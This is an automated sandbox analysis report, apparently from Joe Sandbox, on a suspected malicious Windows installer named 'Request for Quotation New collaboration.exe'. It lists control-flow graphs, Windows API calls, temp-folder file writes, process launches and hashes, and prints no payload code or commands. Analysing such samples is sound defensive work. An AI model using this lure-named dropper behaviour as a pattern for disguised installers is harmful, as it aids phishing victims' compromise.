                                                                                                                                  control_flow_graph 803 10001771-100017ad call 10001b3e 807 100017b3-100017b7 803->807 808 100018be-100018c0 803->808 809 100017c0-100017cd call 100022eb 807->809 810 100017b9-100017bf call 100022a1 807->810 815 100017fd-10001804 809->815 816 100017cf-100017d4 809->816 810->809 817 10001824-10001828 815->817 818 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 815->818 819 100017d6-100017d7 816->819 820 100017ef-100017f2 816->820 821 10001866-1000186c call 1000248d 817->821 822 1000182a-10001864 call 100015cc call 1000248d 817->822 843 1000186d-10001871 818->843 825 100017d9-100017da 819->825 826 100017df-100017e0 call 10002868 819->826 820->815 823 100017f4-100017f5 call 10002b23 820->823 821->843 822->843 836 100017fa 823->836 831 100017e7-100017ed call 1000260b 825->831 832 100017dc-100017dd 825->832 839 100017e5 826->839 842 100017fc 831->842 832->815 832->826 836->842 839->836 842->815 846 10001873-10001881 call 10002450 843->846 847 100018ae-100018b5 843->847 853 10001883-10001886 846->853 854 10001899-100018a0 846->854 847->808 849 100018b7-100018b8 GlobalFree 847->849 849->808 853->854 856 10001888-10001890 853->856 854->847 855 100018a2-100018ad call 10001555 854->855 855->847 856->854 858 10001892-10001893 FreeLibrary 856->858 858->854
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                    • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                    • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                    • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                    • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767494692-3916222277
                                                                                                                                  • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                  • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                                  • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                  • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 860 403062-403070 861 403072-403088 SetFilePointer 860->861 862 40308e-403097 call 40317d 860->862 861->862 865 403177-40317a 862->865 866 40309d-4030b0 call 405bd9 862->866 869 403163 866->869 870 4030b6-4030ca call 40317d 866->870 872 403165-403166 869->872 870->865 874 4030d0-4030d3 870->874 872->865 875 4030d5-4030d8 874->875 876 40313f-403145 874->876 879 403174 875->879 880 4030de 875->880 877 403147 876->877 878 40314a-403161 ReadFile 876->878 877->878 878->869 881 403168-403171 878->881 879->865 882 4030e3-4030ed 880->882 881->879 883 4030f4-403106 call 405bd9 882->883 884 4030ef 882->884 883->869 887 403108-40311d WriteFile 883->887 884->883 888 40313b-40313d 887->888 889 40311f-403122 887->889 888->872 889->888 890 403124-403137 889->890 890->882 891 403139 890->891 891->879
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                  • String ID: x>A
                                                                                                                                  • API String ID: 539440098-3854404225
                                                                                                                                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                  • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                  • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 892 405b85-405b91 893 405b92-405bc6 GetTickCount GetTempFileNameW 892->893 894 405bd5-405bd7 893->894 895 405bc8-405bca 893->895 897 405bcf-405bd2 894->897 895->893 896 405bcc 895->896 896->897
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                  • API String ID: 1716503409-2113348990
                                                                                                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                  • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                  • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                    • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                    • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  • Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                                  • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                  • Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                                  • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                    • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                  • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                  • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405678
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                  • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                  • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00403347
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 4115351271-3283962145
                                                                                                                                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                  • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                  • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                  • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                  • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                  • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                  • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                  • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                  • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                  • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                  • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                  • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
